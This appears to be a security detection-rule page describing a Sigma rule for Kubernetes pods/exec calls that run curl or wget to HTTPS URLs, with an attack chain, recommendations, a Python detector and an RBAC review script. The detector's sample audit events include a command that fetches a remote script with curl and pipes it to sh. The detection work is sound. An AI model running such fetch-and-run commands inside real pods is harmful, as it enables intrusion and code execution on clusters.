Kubernetes Pod Exec with Curl or Wget to HTTPS
This rule detects Kubernetes pod exec API calls using curl or wget to fetch HTTPS URLs, potentially indicating malicious activity such as staging tools or exfiltrating data.
This detection rule identifies suspicious activity within Kubernetes environments where attackers leverage kubectl exec or similar API calls to execute commands within pods. Specifically, it focuses on instances where these commands involve using curl or wget to retrieve content over HTTPS. Attackers may use this technique to download malicious scripts, tools, or exfiltrate sensitive data from compromised pods. This activity is flagged based on decoded request URIs from Kubernetes audit logs, reconstructed command strings, and filtering of benign traffic related to cluster health checks and OIDC/JWKS endpoints. The rule aims to detect anomalous behavior that deviates from typical pod execution patterns, helping defenders identify potential intrusions or misuse of pod execution privileges. The rule was created on 2026/04/23 and last updated on 2026/04/23 according to the source.
Attack Chain
- An attacker gains unauthorized access to the Kubernetes cluster, possibly through compromised credentials or a vulnerability.
- The attacker identifies a target pod within the cluster in which to execute commands.
- The attacker uses kubectl exec or a similar API call to initiate a shell session within the target pod.
- The attacker crafts a command using curl or wget to download a malicious script or tool, or to exfiltrate data over HTTPS. The URL is often encoded in the requestURI.
- The Kubernetes API server records the exec call and its parameters in the audit logs.
- The detection rule decodes the requestURI, extracts the command string, and identifies the use of curl or wget with an HTTPS URL.
- The rule filters out known benign URLs associated with cluster health checks or OIDC/JWKS endpoints.
- If the command is identified as malicious, an alert is triggered, indicating a potential compromise.
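The decode-and-filter steps above, worked through in code. This is an added example written for this page, not the Sigma rule's own query: it reconstructs the exec command from the repeated command= parameters in a pods/exec requestURI, looks for curl or wget paired with an https:// URL, and drops hits against an allowlist of health-check and OIDC/JWKS paths. The audit events and the allowlist patterns are constructed and should be tuned per cluster.

```python
"""Toy detector for Kubernetes pods/exec audit events whose command runs curl
or wget against an HTTPS URL.  Added example, not the Sigma rule's own logic;
the audit events and the benign-URL allowlist below are constructed/assumed."""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist for the benign traffic the rule tunes out (cluster health
# checks, OIDC discovery, JWKS).  Real patterns depend on the cluster.
BENIGN_URL_PATTERNS = [
    re.compile(r"/(healthz|readyz|livez)(\?|$)"),
    re.compile(r"/\.well-known/openid-configuration(\?|$)"),
    re.compile(r"/(\.well-known/jwks\.json|openid/v1/jwks)(\?|$)"),
]
EXEC_PATH = re.compile(r"^/api/v1/namespaces/(?P<ns>[^/]+)/pods/(?P<pod>[^/]+)/exec$")
HTTPS_URL = re.compile(r"https://[^\s'\"]+")
DOWNLOADERS = {"curl", "wget"}


def reconstruct_command(request_uri):
    """Return (namespace, pod, command) for a pods/exec requestURI, else None.

    kubectl sends each argv element as its own repeated ?command= parameter,
    percent-encoded; parse_qs preserves order and decodes '+' and %XX."""
    parts = urlsplit(request_uri)
    match = EXEC_PATH.match(parts.path)
    if not match:
        return None
    argv = parse_qs(parts.query, keep_blank_values=True).get("command", [])
    return match.group("ns"), match.group("pod"), " ".join(argv)


def is_benign(url):
    return any(p.search(url) for p in BENIGN_URL_PATTERNS)


def evaluate_event(event):
    """Return an alert dict for a suspicious exec event, else None."""
    # kubectl exec POSTs (verb "create"); the API server also accepts GET upgrades.
    if event.get("verb") not in ("create", "get"):
        return None
    rec = reconstruct_command(event.get("requestURI", ""))
    if rec is None:
        return None
    namespace, pod, command = rec
    # Match the program name even when invoked by absolute path (/usr/bin/curl).
    if not any(tok.rsplit("/", 1)[-1] in DOWNLOADERS for tok in command.split()):
        return None
    urls = [u for u in HTTPS_URL.findall(command) if not is_benign(u)]
    if not urls:
        return None
    return {
        "namespace": namespace,
        "pod": pod,
        "user": event.get("user", {}).get("username"),
        "command": command,
        "urls": urls,
    }


def scan(events):
    """Run evaluate_event over a list of audit events and return the alerts."""
    return [alert for alert in map(evaluate_event, events) if alert]


# Constructed audit.k8s.io Event records, trimmed to the fields used here.
SAMPLE_EVENTS = [
    {"verb": "create", "user": {"username": "dev@example.invalid"},
     "requestURI": "/api/v1/namespaces/prod/pods/web-0/exec?command=sh&command=-c"
                   "&command=curl+-sSL+https%3A%2F%2Fcdn.example.invalid%2Fagent.sh+%7C+sh"
                   "&container=web&stdin=true&stdout=true&tty=true"},
    {"verb": "create", "user": {"username": "system:serviceaccount:monitoring:probe"},
     "requestURI": "/api/v1/namespaces/monitoring/pods/probe-1/exec?command=curl&command=-sf"
                   "&command=https%3A%2F%2Fkubernetes.default.svc%2Fhealthz&container=probe&stdout=true"},
    {"verb": "create", "user": {"username": "ops@example.invalid"},
     "requestURI": "/api/v1/namespaces/prod/pods/api-2/exec?command=ls&command=-la&container=api&stdout=true"},
    {"verb": "get", "user": {"username": "ops@example.invalid"},
     "requestURI": "/api/v1/namespaces/prod/pods/api-2"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(json.dumps(alert, indent=2))
```

Run against the constructed events, only the first one alerts: the health-check probe is dropped by the allowlist, the plain ls has no downloader, and the final record is not an exec call at all. Tokenizing the joined argv (rather than only the first element) is what catches the common sh -c wrapping.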
Impact
Successful exploitation can lead to the deployment of malicious tools within the Kubernetes environment, potentially enabling lateral movement, data theft, or denial-of-service attacks. Compromised pods could expose sensitive data or be used as a launchpad for further attacks on the cluster or other systems. The scope of impact depends on the permissions granted to the compromised pod and the attacker’s objectives.
Recommendation
- Deploy the Sigma rule “Kubernetes Pod Exec with Curl or Wget to HTTPS” to your SIEM and tune for your environment.
- Review Kubernetes RoleBindings for pods/exec to ensure only required principals retain access in sensitive namespaces.
- Investigate any alerts generated by the Sigma rule by reviewing the decoded URI and reconstructed command in the alert details.
- Implement network policies to restrict egress traffic from pods, limiting the potential for data exfiltration via HTTPS.
- Regularly audit Kubernetes audit logs for suspicious activity related to pod execution and API calls.
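One way to carry out the RoleBindings review recommended above, as an added example that is not part of the rule page: resolve every Role and ClusterRole that allows create on pods/exec, follow RoleBindings and ClusterRoleBindings back to their subjects, and report which principals can exec in a given set of sensitive namespaces. The input shape assumed is the .items list from kubectl get roles,clusterroles,rolebindings,clusterrolebindings -A -o json; the RBAC objects below are constructed.

```python
"""Enumerate which principals can create pods/exec in sensitive namespaces by
resolving Roles/ClusterRoles through their bindings.  Added example, not part
of the rule page; the RBAC objects below are constructed.  Input shape is the
.items list of `kubectl get roles,clusterroles,rolebindings,clusterrolebindings
-A -o json`.  resourceNames restrictions are ignored (still reported as a grant)."""

EXEC_RESOURCES = {"pods/exec", "pods/*", "*"}


def rule_grants_exec(rule):
    """True if a PolicyRule allows 'create' on pods/exec (the verb RBAC needs for exec)."""
    groups = rule.get("apiGroups", [])
    verbs = rule.get("verbs", [])
    return (("" in groups or "*" in groups)
            and bool(EXEC_RESOURCES & set(rule.get("resources", [])))
            and ("create" in verbs or "*" in verbs))


def roles_granting_exec(items):
    """Set of (kind, namespace, name) for Roles/ClusterRoles containing such a rule."""
    found = set()
    for obj in items:
        if obj["kind"] in ("Role", "ClusterRole") and any(
                rule_grants_exec(r) for r in obj.get("rules", [])):
            found.add((obj["kind"], obj["metadata"].get("namespace", ""), obj["metadata"]["name"]))
    return found


def subject_id(subject):
    """Stable display name for a binding subject (User, Group or ServiceAccount)."""
    if subject["kind"] == "ServiceAccount":
        return f"ServiceAccount:{subject.get('namespace', '')}/{subject['name']}"
    return f"{subject['kind']}:{subject['name']}"


def exec_principals(items):
    """(subject, scope) pairs; scope is a namespace name or 'cluster-wide'."""
    granting = roles_granting_exec(items)
    findings = []
    for obj in items:
        if obj["kind"] not in ("RoleBinding", "ClusterRoleBinding"):
            continue
        ref = obj["roleRef"]
        ns = obj["metadata"].get("namespace", "")
        # A RoleBinding may reference a namespaced Role or a ClusterRole;
        # a ClusterRoleBinding grants the ClusterRole in every namespace.
        ref_ns = ns if ref["kind"] == "Role" else ""
        if (ref["kind"], ref_ns, ref["name"]) not in granting:
            continue
        scope = "cluster-wide" if obj["kind"] == "ClusterRoleBinding" else ns
        findings.extend((subject_id(s), scope) for s in obj.get("subjects", []))
    return findings


def review_exec_access(items, sensitive_namespaces):
    """Sorted findings that reach a sensitive namespace, directly or cluster-wide."""
    return sorted({(s, scope) for s, scope in exec_principals(items)
                   if scope == "cluster-wide" or scope in sensitive_namespaces})


def _rule(groups, resources, verbs):
    return {"apiGroups": groups, "resources": resources, "verbs": verbs}


# Constructed RBAC objects (metadata trimmed to what the functions read).
SAMPLE_RBAC = [
    {"kind": "ClusterRole", "metadata": {"name": "cluster-admin"},
     "rules": [_rule(["*"], ["*"], ["*"])]},
    {"kind": "ClusterRole", "metadata": {"name": "pod-exec"},
     "rules": [_rule([""], ["pods/exec"], ["create"])]},
    {"kind": "Role", "metadata": {"name": "debug", "namespace": "prod"},
     "rules": [_rule([""], ["pods/exec"], ["create"])]},
    {"kind": "Role", "metadata": {"name": "view-logs", "namespace": "prod"},
     "rules": [_rule([""], ["pods/log"], ["get"])]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "cluster-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:masters"}]},
    {"kind": "RoleBinding", "metadata": {"name": "debug-devs", "namespace": "prod"},
     "roleRef": {"kind": "Role", "name": "debug"},
     "subjects": [{"kind": "Group", "name": "devs"}]},
    {"kind": "RoleBinding", "metadata": {"name": "ci-exec", "namespace": "staging"},
     "roleRef": {"kind": "ClusterRole", "name": "pod-exec"},
     "subjects": [{"kind": "ServiceAccount", "name": "runner", "namespace": "ci"}]},
    {"kind": "RoleBinding", "metadata": {"name": "log-readers", "namespace": "prod"},
     "roleRef": {"kind": "Role", "name": "view-logs"},
     "subjects": [{"kind": "User", "name": "auditor@example.invalid"}]},
]

if __name__ == "__main__":
    for subject, scope in review_exec_access(SAMPLE_RBAC, {"prod"}):
        print(f"{subject:32} can exec in {scope}")
```

With prod marked sensitive, the report lists the devs group (via the namespaced Role) and system:masters (cluster-wide through cluster-admin), while the CI service account bound only in staging and the log readers are left out. Wildcards in apiGroups, resources or verbs are treated as grants, since that is how the API server evaluates them.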
Detection coverage (2 rules)
- Kubernetes Pod Exec with Curl or Wget to HTTPS (severity: high): Detects pod exec API calls with curl or wget fetching HTTPS URLs.
- Kubernetes Pod Exec API calls (severity: info): Detects any calls to the pods/exec API in Kubernetes.